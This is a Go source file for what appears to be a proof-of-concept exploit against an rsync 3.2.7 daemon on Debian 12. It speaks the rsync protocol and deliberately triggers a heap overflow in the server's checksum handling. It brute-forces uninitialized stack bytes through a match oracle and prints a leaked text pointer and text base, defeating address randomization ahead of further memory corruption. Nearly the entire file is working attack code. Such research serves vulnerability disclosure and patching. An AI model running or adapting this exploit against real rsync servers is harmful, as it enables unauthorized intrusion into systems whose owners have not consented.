// CLI for a PoC for rsync client -> server memory corruption
package main

import (
	"encoding/binary"
	"fmt"
	"io"
	"os"
	"strings"

	"github.com/OneOfOne/xxhash"

	"cvr.google.com/pkg/client"
	"cvr.google.com/pkg/util"
)

const (
	// checkCompressionOffset is specific to the Debian 12 build of rsync 3.2.7
	// (sha256sum ab0311a3e8e417aa2f0fd5727f6f5d03c1aedf562a386de03e72faef1e90c1e2).
	// It is the offset of the text pointer we leak, <set_compression+599>, relative
	// to the binary's text base; main subtracts it from the leaked pointer.
	checkCompressionOffset = 0x42847

	// checksumSeed is sent to the server via --checksum-seed and is also used
	// locally to seed the xxh64 hash of the target file, so both sides agree.
	checksumSeed = 1337

	// maxBlockSize is rsync's maximum block length for protocol versions >= 30.
	// Only files smaller than this are targeted, so a single block can cover the
	// whole file. Older protocols use a larger limit (OLD_MAX_BLOCK_SIZE, 1 << 29
	// in upstream rsync.h — verify). Targeting larger files would mean lowering
	// protocolVersion, which changes the wire format and needs re-testing.
	maxBlockSize = 1 << 17

	// sumBufSize is the assumed size in bytes of rsync's struct sum_buf on the
	// target build.
	sumBufSize = 40

	// pageSize is the assumed page size of the target host.
	pageSize = 4096

	// overflowSize is the tail budget nextCount uses: it accepts a count only when
	// count*sumBufSize ends fewer than this many bytes into a page (presumably the
	// size of the overflow being accommodated — confirm).
	overflowSize = 64

	// pageIncrementCount is the smallest number of sum_bufs whose combined size
	// exceeds one page: 103*40 = 4120 > 4096, while 102*40 = 4080 does not.
	pageIncrementCount = 103
)

var (
	// digest is the checksum algorithm name handed to client.NewRsyncClient; main
	// hashes the target file with seeded xxh64 to match it.
	digest = "xxh64"

	// protocolVersion is the rsync protocol version handed to client.NewRsyncClient.
	protocolVersion = "31"

	// url is the rsync://<host>:<port>/<module> target, set from the command line
	// in main.
	url string
)

// nextCount returns the smallest count that is at least pageIncrementCount larger
// than currCount and whose allocation size, count*sumBufSize, ends fewer than
// overflowSize bytes into a page, i.e. (count*sumBufSize) % pageSize < overflowSize.
//
// The search always terminates. With sumBufSize = 40 and pageSize = 4096,
// count*40 mod 4096 cycles through every multiple of 8 with period 512, so a
// residue below 64 (for example 0) is reached within at most 512 steps.
func nextCount(currCount int) int {
	candidate := currCount + pageIncrementCount
	for (candidate*sumBufSize)%pageSize >= overflowSize {
		candidate++
	}
	return candidate
}

// downloadInitialFile lists the root of the module over rclient and downloads the
// first regular file smaller than maxBlockSize.
//
// The oracle needs the strong checksum of the target file as the server computes
// it, i.e. seeded with checksumSeed. rsync can send a whole-file checksum up front,
// but that checksum does not take the checksum seed into account, and the seed
// cannot be disabled. So this first connection lists all files, picks one, and
// downloads its contents so the caller can hash them locally.
//
// It returns the file contents, the file's index in the server's file list and the
// chosen file entry. rclient is closed before returning, on success and on error.
func downloadInitialFile(rclient *client.RsyncClient) ([]byte, int, *client.File, error) {
	defer rclient.Close()

	// argument parsing happens here:
	// https://github.com/RsyncProject/rsync/blob/9615a2492bbf96bc145e738ebff55bbb91e0bbee/clientserver.c#L1059-L1065
	// https://github.com/RsyncProject/rsync/blob/9615a2492bbf96bc145e738ebff55bbb91e0bbee/options.c#L1349
	// please note that a change in these options can change the protocol altogether (different ints
	// are sent in different places etc. If you change something here, make sure to test it)

	// tell the server that it is supposed to send us the files by making it sender and server
	// the order of --server and --sender is important
	rclient.WriteLine("--server")
	rclient.WriteLine("--sender")

	// set these options to make reading the code easier and to avoid sources of unwanted allocations
	rclient.WriteLine("--no-compress")
	rclient.WriteLine("--no-iconv")

	// set the checksum seed. This will make future calculations a little easier
	rclient.WriteLine("--checksum-seed=" + fmt.Sprintf("%d", checksumSeed))

	// set --checksum which enables `always_checksum`. This will send us the full checksum
	// of the file before sending the file itself.
	// This is useful for us so that we don't need to download files before performing
	// stack uninitialized data oracles
	rclient.WriteLine("--checksum")

	// explicitly disable crtimes and atimes to prevent the server from sending them to us. This may cause
	// a desync in the protocol depending on compilation options
	rclient.WriteLine("--no-crtimes")
	rclient.WriteLine("--no-atimes")

	// disable some other extra things to prevent the server from sending us extra data
	rclient.WriteLine("--no-owner")
	rclient.WriteLine("--no-group")
	rclient.WriteLine("--no-devices")
	rclient.WriteLine("--no-specials")
	rclient.WriteLine("--no-links")
	rclient.WriteLine("--no-hard-links")
	rclient.WriteLine("--no-acls")

	// disable `inc_recurse` and just send the entire file list at once
	rclient.WriteLine("--no-inc-recursive")

	// setting this will disable allow_inc_recurse and send us the entire file list at once
	// client.WriteLine("--qsort")

	// recursively download the module
	rclient.WriteLine("-r")

	// the -e option is followed by . and then different client information options
	// https://github.com/RsyncProject/rsync/blob/9615a2492bbf96bc145e738ebff55bbb91e0bbee/compat.c#L719
	// v sets do_negotiated_strings to true, which lets the client negotiate the
	// checksum algorithm (this tool requests `digest`)
	rclient.WriteLine("-e.v")

	// sending a dot line and then a filepath tells the server which files we are requesting
	// in this case, ask for the root of the module.
	// NOTE(review): oracleStep requests rclient.Module + "/" instead of "./"; both are
	// assumed to yield the same file list ordering (the file index is reused) — confirm.
	rclient.WriteLine(".")
	rclient.WriteLine("./")

	// An empty line finishes the argument list. Only this write is checked: if the
	// previous arguments were not sent, the server will not send the files anyway.
	if err := rclient.WriteLine(""); err != nil {
		return nil, -1, nil, fmt.Errorf("sending arguments: %w", err)
	}

	// here, we setup the protocol and setup digest negotiation etc. This is the first step
	// in the protocol and is done before the actual file transfer starts.
	if err := rclient.SetupProtocol(); err != nil {
		return nil, -1, nil, fmt.Errorf("setting up protocol: %w", err)
	}

	// Don't send filters
	rclient.WriteRawInt(0)

	files, err := rclient.ReadFileList()
	if err != nil {
		return nil, -1, nil, fmt.Errorf("reading file list: %w", err)
	}

	// look for a regular file that is smaller than the maxBlockSize.
	// https://github.com/RsyncProject/rsync/blob/9615a2492bbf96bc145e738ebff55bbb91e0bbee/match.c#L218-L238
	// This way rsync generates a single digest for the entire file, which we can
	// compute ourselves from the downloaded contents.
	targetFileNdx := -1
	for i := range files {
		if util.IsReg(files[i].Mode) && files[i].Size < maxBlockSize {
			targetFileNdx = i
			break
		}
	}
	if targetFileNdx < 0 {
		return nil, -1, nil, fmt.Errorf("could not find a regular file that is smaller than the max block size %d", maxBlockSize)
	}
	// Point into the slice rather than at a loop variable.
	targetFile := &files[targetFileNdx]

	fmt.Printf("[*] Targeting file '%s'\n", targetFile.Name)

	// download the file so that the digest can be calculated later
	fileContents, err := rclient.DownloadFile(targetFileNdx, targetFile)
	if err != nil {
		return nil, -1, nil, fmt.Errorf("downloading %q: %w", targetFile.Name, err)
	}

	return fileContents, targetFileNdx, targetFile, nil
}

// oracleStep opens a fresh connection to url and performs one comparison against
// uninitialized data on the server's stack.
//
// Every comparison uses its own connection so that even dynamic data on the stack
// (heap pointers etc.) is the same each time. The daemon serves connections from a
// fork loop and libc's allocator is deterministic, so sending the exact same packets
// should yield the same stack contents.
//
// targetNdx and targetSize identify the file picked by downloadInitialFile. sum1 is
// that file's weak checksum. oracleValue is sent as the strong checksum for every
// block, and its length becomes s2length. As built by main, oracleValue holds the
// known xxh64 digest of the file, then any stack bytes leaked so far, then the byte
// currently being guessed.
//
// It returns true if the first token the server sends back is negative and false if
// it is positive. A returned error means the attempt was inconclusive and may be
// retried: the client could not be created, the connection broke before the token
// arrived, or the token was zero. Other protocol failures print a message and
// terminate the process.
func oracleStep(url string, targetNdx, targetSize int, sum1 uint32, oracleValue []byte) (bool, error) {
	rclient, err := client.NewRsyncClient(url, protocolVersion, digest)
	if rclient == nil {
		// Never report a failed connect as a plain "no match".
		if err == nil {
			err = fmt.Errorf("could not create rsync client for %s", url)
		}
		return false, err
	}
	defer rclient.Close()

	// argument parsing happens here:
	// https://github.com/RsyncProject/rsync/blob/9615a2492bbf96bc145e738ebff55bbb91e0bbee/clientserver.c#L1059-L1065
	// https://github.com/RsyncProject/rsync/blob/9615a2492bbf96bc145e738ebff55bbb91e0bbee/options.c#L1349
	// please note that a change in these options can change the protocol altogether (different ints
	// are sent in different places etc. If you change something here, make sure to test it)

	// tell the server that it is supposed to send us the files by making it sender and server
	// the order of --server and --sender is important
	rclient.WriteLine("--server")
	rclient.WriteLine("--sender")

	// setup compress-choice so that a recursive function call gets triggered
	// that leads to a global pointer being placed on the stack for the leak
	rclient.WriteLine("--compress-choice=zlib")
	// rclient.WriteLine("--skip-compress=*")
	// rclient.WriteLine("--no-compress")

	rclient.WriteLine("--no-iconv")

	// set the checksum seed. This will make future calculations a little easier
	rclient.WriteLine("--checksum-seed=" + fmt.Sprintf("%d", checksumSeed))

	// set --checksum which enables `always_checksum`. This will send us the full checksum
	// of the file before sending the file itself.
	// This is useful for us so that we don't need to download files before performing
	// stack uninitialized data oracles
	rclient.WriteLine("--checksum")

	// explicitly disable crtimes and atimes to prevent the server from sending them to us. This may cause
	// a desync in the protocol depending on compilation options
	rclient.WriteLine("--no-crtimes")
	rclient.WriteLine("--no-atimes")

	// disable some other extra things to prevent the server from sending us extra data
	rclient.WriteLine("--no-owner")
	rclient.WriteLine("--no-group")
	rclient.WriteLine("--no-devices")
	rclient.WriteLine("--no-specials")
	rclient.WriteLine("--no-links")
	rclient.WriteLine("--no-hard-links")
	rclient.WriteLine("--no-acls")

	// disable `inc_recurse` and just send the entire file list at once
	rclient.WriteLine("--no-inc-recursive")

	// setting this will disable allow_inc_recurse and send us the entire file list at once
	// client.WriteLine("--qsort")

	// recursively download the module
	rclient.WriteLine("-r")

	// the -e option is followed by . and then different client information options
	// https://github.com/RsyncProject/rsync/blob/9615a2492bbf96bc145e738ebff55bbb91e0bbee/compat.c#L719
	// v sets do_negotiated_strings to true, which lets the client negotiate the
	// checksum algorithm (this tool requests `digest`)
	rclient.WriteLine("-e.v")

	// sending a dot line and then a filepath tells the server which files we are requesting
	// in this case, ask for the root of the module
	rclient.WriteLine(".")
	rclient.WriteLine(rclient.Module + "/")

	// empty line to finish sending arguments
	err = rclient.WriteLine("")

	// only check for errors here. If the previous arguments were not sent, the server will not
	// send the files anyway
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to send arguments: %v\n", err.Error())
		os.Exit(1)
	}

	// here, we setup the protocol and setup digest negotiation etc. This is the first step
	// in the protocol and is done before the actual file transfer starts.
	err = rclient.SetupProtocol()
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to setup protocol: %v\n", err.Error())
		os.Exit(1)
	}

	// Don't send filters
	rclient.WriteRawInt(0)

	// we have to consume the file list every time to consume the input data from
	// the server
	_, err = rclient.ReadFileList()
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to read file list: %v\n", err.Error())
		os.Exit(1)
	}

	// we are now ready to kick off the Oracle logic
	// We are now sending the index of the file that we want to download.
	// https://github.com/RsyncProject/rsync/blob/9615a2492bbf96bc145e738ebff55bbb91e0bbee/rsync.c#L322
	err = rclient.WriteNdx(targetNdx)
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to write ndx: %v\n", err.Error())
		os.Exit(1)
	}

	// by setting iflags to ITEM_TRANSFER, rsync does not ask for any more data after this but sends
	// us the file directly
	iflags := client.ItemTransferFlag
	err = rclient.WriteShortInt(iflags)
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to write iflags: %v\n", err.Error())
		os.Exit(1)
	}

	// we should now reach receive_sums
	// https://github.com/RsyncProject/rsync/blob/9615a2492bbf96bc145e738ebff55bbb91e0bbee/sender.c#L70

	// first the sum head

	// count leads to an allocation of count * sizeof(struct sum_buf), i.e.
	// 3277 * 40 = 131080 bytes, just over 128KB. Since we accidentally trigger the
	// heap overflow for the infoleak, we want the allocation to be at least 128KB:
	// libc then allocates it with `mmap()`, which is page aligned, leaving plenty of
	// padding so that our overflow does not crash the server.
	// https://github.com/RsyncProject/rsync/blob/9615a2492bbf96bc145e738ebff55bbb91e0bbee/sender.c#L96
	count := 3277

	rclient.WriteRawInt(count)

	// blength is set to the size of the file. That way the strong checksum is
	// calculated over the entire file
	rclient.WriteRawInt(targetSize)

	// s2length: oracleValue starts with the known 8-byte xxh64 digest of the file;
	// its last byte is the guess for the next unknown byte and anything in between
	// is bytes already leaked
	rclient.WriteRawInt(len(oracleValue))

	// let's set the remainder to 0. We don't need this
	rclient.WriteRawInt(0)

	// and now write the actual digest for each of the counts, as well as sum1
	for i := 0; i < count; i++ {
		rclient.WriteRawInt(int(sum1))
		rclient.Write(oracleValue)
	}

	// for some reason, the server will now send us the ndx and iflags back again, although it
	// never modifies them. Let's consume the data
	// https://github.com/RsyncProject/rsync/blob/9615a2492bbf96bc145e738ebff55bbb91e0bbee/sender.c#L409-L410
	_, err = rclient.ReadNdx()
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to read ndx: %v\n", err.Error())
		os.Exit(1)
	}
	_, err = rclient.ReadShortInt()
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to read iflags: %v\n", err.Error())
		os.Exit(1)
	}

	// we already know count is going to be 0 so we can just consume it
	rclient.ReadInt()

	// blength is the size of the file. Already known as well
	rclient.ReadInt()

	// s2length as well
	rclient.ReadInt()

	// finally remainder. Check for an error here to see if our connection is still
	// intact; a broken connection is reported to the caller so it can retry
	_, err = rclient.ReadInt()
	if err != nil {
		return false, err
	}

	signal, _, err := rclient.ReceiveDeflateToken()
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to receive deflate token: %v\n", err.Error())
		os.Exit(1)
	}

	signal32 := int32(signal)

	// NOTE(review): presumably an out-of-range index that makes the server end the
	// session; its result is intentionally ignored — confirm.
	rclient.WriteNdx(13371337)

	// Presumably (see rsync's token.c) a negative token refers to a matched block and
	// a positive one announces literal data, so a negative token means the server
	// accepted our strong checksum.
	switch {
	case signal32 < 0:
		return true, nil
	case signal32 > 0:
		return false, nil
	default:
		// Previously a panic; report it so the caller can retry instead of crashing.
		return false, fmt.Errorf("unexpected zero token from server")
	}
}

// main leaks a text pointer from the rsync daemon given as the only argument
// (rsync://<host>:<port>/<module>) and prints the derived text base.
//
// It first downloads a small file (downloadInitialFile) and computes its weak and
// seeded xxh64 checksums. It then leaks the 8 bytes that follow the 8-byte digest,
// one at a time, by trying all 256 values per byte with oracleStep. Finally it
// interprets those 8 bytes as a little-endian pointer.
//
// Retries are unbounded. An oracleStep error retries the same guess, and a byte
// with no matching value is retried from scratch.
func main() {
	if len(os.Args) < 2 {
		fmt.Fprintf(os.Stderr, "Usage: %s rsync://<host>:<port>/<module>\n", os.Args[0])
		os.Exit(1)
	}

	url = os.Args[1]
	if !strings.HasPrefix(url, "rsync://") {
		fmt.Fprintf(os.Stderr, "url must be in format of rsync://<host>:<port>/<module> (it was %s)\n", url)
		os.Exit(1)
	}

	fmt.Printf("[*] Connecting to %s\n", url)

	rclient, err := client.NewRsyncClient(url, protocolVersion, digest)
	if rclient == nil {
		// %v (not err.Error()) so a nil err cannot cause a nil-pointer panic here.
		fmt.Fprintf(os.Stderr, "Failed to create client: %v\n", err)
		os.Exit(1)
	}
	fmt.Printf("[*] Connected to %s\n", url)

	fileContents, targetFileNdx, targetFile, err := downloadInitialFile(rclient)
	if err != nil {
		fmt.Fprintf(os.Stderr, "Failed to download initial file: %v\n", err)
		os.Exit(1)
	}

	// sum1 is the weak checksum. sum2 is the xxh64 digest seeded with checksumSeed,
	// serialized little-endian, so it matches the strong checksum sent by the server.
	sum1 := util.Adler32(fileContents)
	h := xxhash.NewS64(checksumSeed)
	io.WriteString(h, string(fileContents))
	sum2 := binary.LittleEndian.AppendUint64(nil, h.Sum64())

	fmt.Printf("[+] Downloaded target file '%s' with index %d with size %d (%x)\n", targetFile.Name, targetFileNdx, targetFile.Size, sum2)

	const leakCount = 8
	for j := 0; j < leakCount; j++ {
		found := false
		for i := 0; i < 256; i++ {
			// The full slice expression caps capacity, so append always copies
			// instead of writing into sum2's backing array.
			oracleValue := append(sum2[:len(sum2):len(sum2)], byte(i))
			res, err := oracleStep(url, targetFileNdx, targetFile.Size, sum1, oracleValue)
			if err != nil {
				fmt.Fprintf(os.Stderr, "Failed to perform oracle step: %v\n", err)
				i-- // retry the same guess
				continue
			}
			if res {
				fmt.Printf("[+] Leaked byte %x from stack\n", i)
				sum2 = append(sum2, byte(i))
				found = true
				break
			}
		}
		if !found {
			fmt.Printf("[-] Could not leak byte %d. Did not find matching byte\n", j)
			j-- // retry the whole byte
		}
	}

	// sum2 now holds the 8-byte digest followed by the 8 leaked bytes.
	ptr := binary.LittleEndian.Uint64(sum2[8:])
	fmt.Printf("[+] Leaked ptr: 0x%x\n", ptr)
	fmt.Printf("[+] Text Base: 0x%x\n", ptr-checkCompressionOffset)
}
